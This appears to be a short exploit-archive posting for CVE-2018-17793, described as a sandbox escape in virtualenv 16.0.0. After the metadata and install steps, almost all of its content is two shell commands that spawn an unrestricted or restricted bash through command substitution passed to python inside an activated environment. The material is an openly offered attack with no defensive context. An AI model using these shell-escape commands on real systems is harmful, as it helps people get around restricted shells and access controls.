virtualenv 16.0.0 Sandbox Escape

virtualenv version 16.0.0 suffers from a sandbox escape vulnerability.


MD5 | e9b225bbc1007fd96955c36fe899b6da

# Exploit Title: virtualenv 16.0.0 - Sandbox Escape
# Date: 2018-10-02
# Exploit Author: vr_system
# Vendor Homepage: https://virtualenv.pypa.io/en/stable/
# Software Link: https://virtualenv.pypa.io/en/stable/
# Version: 16.0.0
# Tested on: kali linux
# CVE : CVE-2018-17793

# 1 Install
# [email protected]:~#pip install virtualenv
# [email protected]:~#virtualenv test_env
# [email protected]:~#cd test_env/
# [email protected]:~/test_env#source ./bin/activate

# 2 Sandbox escape

(test_env) [email protected]:~/test_env#python $(bash >&2)
(test_env) [email protected]:~/test_env#python $(rbash >&2)



Related Posts